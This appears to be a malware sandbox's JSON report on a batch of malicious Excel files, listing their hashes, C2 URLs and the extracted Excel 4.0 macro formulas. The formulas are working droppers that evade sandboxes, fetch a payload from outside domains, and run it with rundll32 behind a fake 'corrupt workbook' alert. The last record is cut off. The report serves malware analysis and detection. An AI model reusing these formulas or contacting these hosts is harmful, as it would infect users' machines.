{"version":"0.2","sample":{"sample":"","kind":"file","target":"607685d399dc709e5e9d15e35d27c066858be578ee943f11e1a723768255e671"},"analysis":{"reported":"2020-04-09T16:16:35Z","score":10},"files":[{"filename":"607685d399dc709e5e9d15e35d27c066858be578ee943f11e1a723768255e671","filesize":209920,"md5":"35b261f92e5862ce6e4235cbe3823812","sha1":"044cdd8fb597258914d8b272c75fafc6965e7026","sha256":"607685d399dc709e5e9d15e35d27c066858be578ee943f11e1a723768255e671","sha512":"8863ba771625bcbb020bf61dda86531644f8e4bd92ddaf2811c5615bf25e7310234cda9a02361d0b96d98b65aef332a75f973fad5431cabae46374b6993090b7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"607685d399dc709e5e9d15e35d27c066858be578ee943f11e1a723768255e671.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"i7jCOq0G7J\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"60a2d98b93502707367d43bcc9cf8fc6c6bed651219f25a07c8f2de750b74917"},"analysis":{"reported":"2020-04-09T16:16:35Z","score":10},"files":[{"filename":"60a2d98b93502707367d43bcc9cf8fc6c6bed651219f25a07c8f2de750b74917","filesize":160768,"md5":"53cb6627315b7afeefedde6428eb03b5","sha1":"4219e560c4af1b2e58874785157740b669cf8fea","sha256":"60a2d98b93502707367d43bcc9cf8fc6c6bed651219f25a07c8f2de750b74917","sha512":"6a96ab829057e0999c0254b4cb9adb1e66c23a2d419a5786a016afca0db3ba575445fdef16e469c35eb0573db131c6856f338833042e8359c67921708c51c289","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"60a2d98b93502707367d43bcc9cf8fc6c6bed651219f25a07c8f2de750b74917.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wJfe56VCvQ\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"60af78d6433794cbf5d231d3b7487631a499d02242d76d4e98ab5566faa4ece8"},"analysis":{"reported":"2020-04-09T16:16:35Z","score":10},"files":[{"filename":"60af78d6433794cbf5d231d3b7487631a499d02242d76d4e98ab5566faa4ece8","filesize":221184,"md5":"98bd2bd34953706d1cb11f704aa8c81e","sha1":"5ebe5730abc58d6bc4a4341dbcfa0be329436695","sha256":"60af78d6433794cbf5d231d3b7487631a499d02242d76d4e98ab5566faa4ece8","sha512":"d5b7435e2d4b3652aa12ec1b4085ee3b954666651941875e3a8c4859fbb0619e74114c47d50a8176c550b8fa714182c75fd3a7661116a541d84df7f6baec3c4e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"60af78d6433794cbf5d231d3b7487631a499d02242d76d4e98ab5566faa4ece8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KQdzrWx8N0\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"60bef30399f36b116020a7330405d026abda508f6ee220a45cc7588a42507320"},"analysis":{"reported":"2020-04-09T16:16:35Z","score":10},"files":[{"filename":"60bef30399f36b116020a7330405d026abda508f6ee220a45cc7588a42507320","filesize":185344,"md5":"d9be24a56522048467b3d37381c64fe9","sha1":"6ed4305a10fe07d47b36bbd71f47e16093c7bf6f","sha256":"60bef30399f36b116020a7330405d026abda508f6ee220a45cc7588a42507320","sha512":"d25f90fd10ab31e14ce5422c38405e6f731e80c34df99ce9bd3d9c7256e3f178b83b2f657681cd6103359647a6b73cd584b3b07abbd5babb3225942575b79c8b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"60bef30399f36b116020a7330405d026abda508f6ee220a45cc7588a42507320.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"60d659db1a74aa5e698cf5c27253b8f4b971492e7cd437c5400a3c8e4d41ab28"},"analysis":{"reported":"2020-04-09T16:16:35Z","score":10},"files":[{"filename":"60d659db1a74aa5e698cf5c27253b8f4b971492e7cd437c5400a3c8e4d41ab28","filesize":167936,"md5":"d2f1bc8974510168c7b1a789fdcbca64","sha1":"94b4801800a416d15f0dcfe8af618b0312cc5eb0","sha256":"60d659db1a74aa5e698cf5c27253b8f4b971492e7cd437c5400a3c8e4d41ab28","sha512":"58b40cd653e46fb47c6b73129cd216692719e9da91db3d255ea82b9452f71b41ff58efa27780a5fc9b5a42cfe6470ef5faabd9dcbc67d2214cfdd11a1d115e6f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"60d659db1a74aa5e698cf5c27253b8f4b971492e7cd437c5400a3c8e4d41ab28.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LVFSHAOytt\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"60d896a77a36799f20aefcddccaa6da338a8dc352b2beade86a1a62d5c4ce283"},"analysis":{"reported":"2020-04-09T16:16:35Z","score":10},"files":[{"filename":"60d896a77a36799f20aefcddccaa6da338a8dc352b2beade86a1a62d5c4ce283","filesize":160768,"md5":"8d925fe931c1336da27f2122f59be161","sha1":"32e47c54e25d413c4cd38a14eb60a52cff15e0b6","sha256":"60d896a77a36799f20aefcddccaa6da338a8dc352b2beade86a1a62d5c4ce283","sha512":"11a79e97e7ea37f74258c979547a283a6d7030f7bf3b02d1511b5c1606dbd7fc1ba42d5c92de2253e9b0cdaa84e91923d6c73b1f8e5a6d2b61e97773a7e9a512","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"60d896a77a36799f20aefcddccaa6da338a8dc352b2beade86a1a62d5c4ce283.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7XVqKJEorr\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"60f907cb73383a7ab69a6af31ed97a7b18de31d41f81028e0e74801e9138b169"},"analysis":{"reported":"2020-04-09T16:16:35Z","score":10},"files":[{"filename":"60f907cb73383a7ab69a6af31ed97a7b18de31d41f81028e0e74801e9138b169","filesize":204800,"md5":"79300a8bbf05ee0fa5c96889c8bb0ea7","sha1":"36be0ea5021fced9071c85250b4f7a8cfa1843ba","sha256":"60f907cb73383a7ab69a6af31ed97a7b18de31d41f81028e0e74801e9138b169","sha512":"022946710f6baf7dbd62f99edc869a20e317918be6ef4e11020e2de452202ff4f71dbbdfe626e1c1f2888345f82d3353a85fa56e00ea72ba8a0bc181076ab0b8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"60f907cb73383a7ab69a6af31ed97a7b18de31d41f81028e0e74801e9138b169.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,HALT())\nIF(GET.WORKSPACE(42),,HALT())\nFOPEN(\"C:\\Users\\Public\\1.vbs\",3)\nMESSAGE(TRUE,\"One moment please...\")\nIF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),EXEC(GET.NOTE(R$34C$3)),)\nIF(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2),EXEC(GET.NOTE(R$36C$3)),)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"612c1cac602486a51e7e54e40d63771044e9ec283a128211ea3d96235ff431f7"},"analysis":{"reported":"2020-04-09T16:16:36Z","score":10},"files":[{"filename":"612c1cac602486a51e7e54e40d63771044e9ec283a128211ea3d96235ff431f7","filesize":209920,"md5":"ec9f1494ff82b4f3c4612212842fc66e","sha1":"44c77d8794a135928b07ee58fb960d2b83f652de","sha256":"612c1cac602486a51e7e54e40d63771044e9ec283a128211ea3d96235ff431f7","sha512":"63517c8fc2d4a2244f8ad521625ba46969a80ab3c250d5e4daa680c28aae438211352064474818e2affd0d71314a2cc0c475aa5291b469a21c53f534c6e19c34","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"612c1cac602486a51e7e54e40d63771044e9ec283a128211ea3d96235ff431f7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fu5diQP2f0\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6131f3c43060b54526353db717f13ba6a6f4dab44a3d56a50b2ce2a763fb55c5"},"analysis":{"reported":"2020-04-09T16:16:36Z","score":10},"files":[{"filename":"6131f3c43060b54526353db717f13ba6a6f4dab44a3d56a50b2ce2a763fb55c5","filesize":116224,"md5":"dbbe6bc0eb2e24a7ad4b4dda2c050861","sha1":"c32d0c2c9ab8cd333e4167870706a2bd005ae08e","sha256":"6131f3c43060b54526353db717f13ba6a6f4dab44a3d56a50b2ce2a763fb55c5","sha512":"12213875f16ecd642925efa7756ef04e0561f3725a1935043253f41f9fcaa2b78a735d9f82420ba227a6c946accbaeb824ef398ce1b39f5d56e20ee4ebce3c5a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6131f3c43060b54526353db717f13ba6a6f4dab44a3d56a50b2ce2a763fb55c5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"o46Gw1Y4pn\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"61369cfa645477646a45a0ad932138de976b9b2374eb979e80bb6574ea011304"},"analysis":{"reported":"2020-04-09T16:16:36Z","score":10},"files":[{"filename":"61369cfa645477646a45a0ad932138de976b9b2374eb979e80bb6574ea011304","filesize":209408,"md5":"f3ad18014d5e04239788671dd776efe0","sha1":"e22272823314171041471d8568f492ea2ae4b076","sha256":"61369cfa645477646a45a0ad932138de976b9b2374eb979e80bb6574ea011304","sha512":"89ccebcb0b994146b7750ed30ac1724c06f5976d909ead2c081395b1e760e496de47e9d3cce5007a9c82bdd59c39c834553428b5d64d204f212a544b83309534","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"61369cfa645477646a45a0ad932138de976b9b2374eb979e80bb6574ea011304.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xd3M3ctxj1\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6162bc2543f708a63c5121ff41bfe7fcb5317b2afb596e3506446be20892f636"},"analysis":{"reported":"2020-04-09T16:16:36Z","score":10},"files":[{"filename":"6162bc2543f708a63c5121ff41bfe7fcb5317b2afb596e3506446be20892f636","filesize":168448,"md5":"e576435dad78e7401634cc94e3768610","sha1":"ab299b5ecb1161dfd7fc1169d92b9672b112ed2a","sha256":"6162bc2543f708a63c5121ff41bfe7fcb5317b2afb596e3506446be20892f636","sha512":"9199493d35636ed385ef4d0f47f3738d92c163837615536f4ccc4d89c6053229a6a4ac1d4fad7b51015734b52794e86e8024ecb20dea4af13c30c8cd4bae7dc0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6162bc2543f708a63c5121ff41bfe7fcb5317b2afb596e3506446be20892f636.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VLQs71dc6h\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6164d7ba94d702bdc18456a5d240d894dade75551779ba6a84be5f26ca86261b"},"analysis":{"reported":"2020-04-09T16:16:36Z","score":10},"files":[{"filename":"6164d7ba94d702bdc18456a5d240d894dade75551779ba6a84be5f26ca86261b","filesize":214528,"md5":"935773b4a278d14d7c2c257a7ad552f2","sha1":"4db5351db056c29b9f1fa4576b8291bf176b6ab6","sha256":"6164d7ba94d702bdc18456a5d240d894dade75551779ba6a84be5f26ca86261b","sha512":"e62447a21e25ff736e50a4e905a3c8d916862539ab69b156cbad362d46b723fd6de79eb5f9a896bd3aa4d3c19ba0326e240d30b9e3df126c90133c4c04acadcc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6164d7ba94d702bdc18456a5d240d894dade75551779ba6a84be5f26ca86261b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"iBUqRPwlug\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6172914da0d68fbb76fafac5104b5cdaf12c6efd8b0a14603b1cbcc995eb542d"},"analysis":{"reported":"2020-04-09T16:16:36Z","score":10},"files":[{"filename":"6172914da0d68fbb76fafac5104b5cdaf12c6efd8b0a14603b1cbcc995eb542d","filesize":152576,"md5":"3fe7756dc0093754510d5bc46eb6ea65","sha1":"ded83d2097634e67d7dacc0729a467f036724073","sha256":"6172914da0d68fbb76fafac5104b5cdaf12c6efd8b0a14603b1cbcc995eb542d","sha512":"0d2ba143f4e024522fa3fe3717e88fb7e02ae1450e1cc612149802f06236870d40095583a0e14639e251d8834182a152332f761aab2a83b62425e2bc3b64463b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6172914da0d68fbb76fafac5104b5cdaf12c6efd8b0a14603b1cbcc995eb542d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bqAiG6wKil\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6172c2804ec0a3788b7f64d56ca4548c1b512d4502c36342a507a482a276f94e"},"analysis":{"reported":"2020-04-09T16:16:36Z","score":10},"files":[{"filename":"6172c2804ec0a3788b7f64d56ca4548c1b512d4502c36342a507a482a276f94e","filesize":209920,"md5":"01b6da32360e0497f0dead8d35d16d9a","sha1":"9105d64d9f1e17450f9ad7a39f0f4402f6c22e54","sha256":"6172c2804ec0a3788b7f64d56ca4548c1b512d4502c36342a507a482a276f94e","sha512":"23b258b320efc26070ae8b07bcffe06f5807b5b002440d677140c65442aed62d3ff3366036b557b61e0d5f4ee2d2268c43525d8ccb6e81ef77ddc1bd884a1ec8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6172c2804ec0a3788b7f64d56ca4548c1b512d4502c36342a507a482a276f94e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 